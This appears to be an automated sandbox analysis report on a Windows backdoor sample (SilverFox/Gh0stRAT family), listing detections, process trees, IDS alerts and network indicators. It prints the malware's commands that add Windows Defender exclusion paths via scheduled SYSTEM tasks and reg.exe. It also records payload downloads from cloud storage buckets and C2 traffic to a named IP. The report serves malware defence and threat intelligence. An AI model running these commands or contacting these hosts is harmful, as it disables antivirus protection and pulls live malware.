Windows Analysis Report
2b687482300.6345827638.08.exe

Overview

General Information

Sample name: 2b687482300.6345827638.08.exe
Analysis ID: 1584369
MD5: 934c8c307939cd29f7d1d434f1ad09ef
SHA1: 452e15ee56888ad6424a15efc523dfc8137516b0
SHA256: 3fdcdf14ff5cb781cda7b1920d229ee59b3684b1d9b1ef939d0549ae0f8815be
Tags: backdoor, exe, msi, silverfox, winos, user-zhuzhu0009

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Adds extensions / path to Windows Defender exclusion list (Registry)
Creates an undocumented autostart registry key
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for dropped file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
Sigma detected: Windows Defender Exclusions Added - Registry
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • EMp3o1.exe (PID: 5956 cmdline: C:\Users\user\Documents\EMp3o1.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • EMp3o1.exe (PID: 6032 cmdline: C:\Users\user\Documents\EMp3o1.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
    • cmd.exe (PID: 940 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7044 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6040 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 728 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 2260 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 2704 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5236 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6804 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 2584 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5232 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 2656 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 2332 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 4060 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 320 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 3792 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5912 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • G5CQjd.exe (PID: 4548 cmdline: "C:\Program Files (x86)\G5CQjd\G5CQjd.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
      • cmd.exe (PID: 4176 cmdline: cmd /c echo.>c:\xxxx.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2084 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 2192 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 3924 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 1320 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 2360 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 6564 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 1080 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 6428 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • G5CQjd.exe (PID: 6888 cmdline: "C:\Program Files (x86)\G5CQjd\G5CQjd.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • Cy9OUo.exe (PID: 3660 cmdline: "C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • Cy9OUo.exe (PID: 2496 cmdline: "C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • Cy9OUo.exe (PID: 5056 cmdline: "C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • G5CQjd.exe (PID: 720 cmdline: "C:\Program Files (x86)\G5CQjd\G5CQjd.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • cleanup
No configs have been found
Yara signature match
Source: 5.2.EMp3o1.exe.2800000.1.unpack
Rule: INDICATOR_SUSPICIOUS_DisableWinDefender
Description: Detects executables containing artifcats associated with disabling Widnows Defender
Author: ditekSHen
Strings:
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath

System Summary

Source: Process started, Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\EMp3o1.exe, ParentImage: C:\Users\user\Documents\EMp3o1.exe, ParentProcessId: 6032, ParentProcessName: EMp3o1.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 940, ProcessName: cmd.exe
Source: Process started, Author: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2084, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 2192, ProcessName: reg.exe
Source: Registry Key set, Author: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 2192, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-05T10:12:54.154885+0100 | 2852901 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 62788 | 8.217.47.169 | 8917 | TCP
2025-01-05T10:12:56.382472+0100 | 2852901 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 62789 | 8.217.47.169 | 8917 | TCP
2025-01-05T10:12:59.159232+0100 | 2852901 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 62790 | 8.217.47.169 | 8917 | TCP
2025-01-05T10:13:16.082102+0100 | 2852901 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 62796 | 8.217.47.169 | 8917 | TCP
2025-01-05T10:13:18.989525+0100 | 2852901 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 62797 | 8.217.47.169 | 8917 | TCP

AV Detection

Source: C:\Program Files (x86)\E2ky7uqb\tbcore3U.dll, Avira: detection malicious, Label: TR/Redcap.vdzex
Source: C:\Program Files (x86)\G5CQjd\tbcore3U.dll, Avira: detection malicious, Label: TR/Redcap.vdzex
Source: 2b687482300.6345827638.08.exe, Virustotal: Detection: 12%
Source: 2b687482300.6345827638.08.exe, ReversingLabs: Detection: 13%
Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\E2ky7uqb\tbcore3U.dll, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\G5CQjd\tbcore3U.dll, Joe Sandbox ML: detected
Source: unknown, HTTPS traffic detected: 39.103.20.34:443 -> 192.168.2.6:62735 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.6:62780 version: TLS 1.2
Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: G5CQjd.exe, 00000028.00000000.3437121582.0000000000718000.00000002.00000001.01000000.0000000A.sdmp, G5CQjd.exe, 00000029.00000002.3482527026.0000000000718000.00000002.00000001.01000000.0000000A.sdmp, G5CQjd.exe, 00000029.00000000.3464191213.0000000000718000.00000002.00000001.01000000.0000000A.sdmp, Cy9OUo.exe, 0000002A.00000000.3469206986.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, Cy9OUo.exe, 0000002A.00000002.3484346566.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, Cy9OUo.exe, 0000002D.00000002.3499578790.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, Cy9OUo.exe, 0000002D.00000000.3491990756.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, Cy9OUo.exe, 0000002E.00000000.3579031648.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, Cy9OUo.exe, 0000002E.00000002.3594006751.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, G5CQjd.exe, 0000002F.00000002.3596772792.0000000000718000.00000002.00000001.01000000.0000000A.sdmp, G5CQjd.exe, 0000002F.00000000.3584367115.0000000000718000.00000002.00000001.01000000.0000000A.sdmp, G5CQjd.exe.6.dr, Cy9OUo.exe.40.dr
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\user\make\build\public\64-bit\vseamps.pdb source: 2b687482300.6345827638.08.exe, 00000000.00000003.2622438995.00000000048DB000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622589579.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2659884614.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622681734.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622615056.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, EMp3o1.exe, 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp, EMp3o1.exe, 00000005.00000000.2758749263.0000000140014000.00000002.00000001.01000000.00000008.sdmp, EMp3o1.exe, 00000006.00000000.2978571160.0000000140014000.00000002.00000001.01000000.00000008.sdmp, EMp3o1.exe.0.dr

Change of critical system settings

Source: C:\Windows\System32\reg.exe, Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramData
Source: C:\Windows\System32\reg.exe, Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users
Source: C:\Windows\System32\reg.exe, Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)
Source: C:\Windows\System32\reg.exe, Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\Documents
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\Documents\EMp3o1.exe, Code function: 5_2_00007FFDAC08A1B8 FindFirstFileExW, 5_2_00007FFDAC08A1B8
Source: C:\Users\user\Documents\EMp3o1.exe, File opened: C:\Users\user\AppData
Source: C:\Users\user\Documents\EMp3o1.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Users\user\Documents\EMp3o1.exe, File opened: C:\Users\user
Source: C:\Users\user\Documents\EMp3o1.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Source: C:\Users\user\Documents\EMp3o1.exe, File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Documents\EMp3o1.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Documents\EMp3o1.exe, Code function: 4x nop then mov rax, qword ptr [rsp+78h], 5_2_000000014000DFFE
Source: C:\Users\user\Documents\EMp3o1.exe, Code function: 4x nop then mov rax, qword ptr [rsp+78h], 5_2_000000014000DDFF
Source: C:\Users\user\Documents\EMp3o1.exe, Code function: 4x nop then movsxd rbx, qword ptr [r14+10h], 5_2_0000000140011270
Source: C:\Users\user\Documents\EMp3o1.exe, Code function: 4x nop then mov rax, qword ptr [rsp+78h], 5_2_000000014000DE96
Source: C:\Users\user\Documents\EMp3o1.exe, Code function: 4x nop then mov rax, qword ptr [rsp+78h], 5_2_000000014000DEFB
Source: C:\Users\user\Documents\EMp3o1.exe, Code function: 4x nop then mov rax, qword ptr [rsp+78h], 5_2_000000014000E178
Source: C:\Users\user\Documents\EMp3o1.exe, Code function: 4x nop then mov rax, qword ptr [rsp+78h], 5_2_000000014000DDD9

Networking

Source: Network traffic, Suricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.6:62790 -> 8.217.47.169:8917
Source: Network traffic, Suricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.6:62796 -> 8.217.47.169:8917
Source: Network traffic, Suricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.6:62789 -> 8.217.47.169:8917
Source: Network traffic, Suricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.6:62788 -> 8.217.47.169:8917
Source: Network traffic, Suricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.6:62797 -> 8.217.47.169:8917
Source: global traffic, TCP traffic: 192.168.2.6:62788 -> 8.217.47.169:8917
Source: global traffic, TCP traffic: 192.168.2.6:62640 -> 162.159.36.2:53
Source: Joe Sandbox View, ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown, TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown, TCP traffic detected without corresponding DNS query: 8.217.47.169
Source: global traffic, HTTP traffic detected: GET /i.dat HTTP/1.1, User-Agent: GetData, Host: msd1sq.oss-cn-beijing.aliyuncs.com, Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /a.gif HTTP/1.1, User-Agent: GetData, Host: msd1sq.oss-cn-beijing.aliyuncs.com, Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /b.gif HTTP/1.1, User-Agent: GetData, Host: msd1sq.oss-cn-beijing.aliyuncs.com, Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /c.gif HTTP/1.1, User-Agent: GetData, Host: msd1sq.oss-cn-beijing.aliyuncs.com, Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /d.gif HTTP/1.1, User-Agent: GetData, Host: msd1sq.oss-cn-beijing.aliyuncs.com, Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /s.dat HTTP/1.1, User-Agent: GetData, Host: msd1sq.oss-cn-beijing.aliyuncs.com, Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /s.jpg HTTP/1.1, User-Agent: GetData, Host: msd1sq.oss-cn-beijing.aliyuncs.com, Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /drops.jpg HTTP/1.1, User-Agent: GetData, Host: 22mm.oss-cn-hangzhou.aliyuncs.com, Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /f.dat HTTP/1.1, User-Agent: GetData, Host: 22mm.oss-cn-hangzhou.aliyuncs.com, Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /FOM-50.jpg HTTP/1.1, User-Agent: GetData, Host: 22mm.oss-cn-hangzhou.aliyuncs.com, Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /FOM-51.jpg HTTP/1.1, User-Agent: GetData, Host: 22mm.oss-cn-hangzhou.aliyuncs.com, Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /FOM-52.jpg HTTP/1.1, User-Agent: GetData, Host: 22mm.oss-cn-hangzhou.aliyuncs.com, Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /FOM-53.jpg HTTP/1.1, User-Agent: GetData, Host: 22mm.oss-cn-hangzhou.aliyuncs.com, Cache-Control: no-cache
Source: global traffic, DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
Source: global traffic, DNS traffic detected: DNS query: msd1sq.oss-cn-beijing.aliyuncs.com
Source: global traffic, DNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com
Source: global traffic, DNS traffic detected: DNS query: cvqthu.net
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2659884614.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2659978186.0000000004907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2659884614.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2659978186.0000000004907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/a
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2597134323.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2659933195.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622464887.00000000005FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gif
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2597134323.00000000005FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gifW
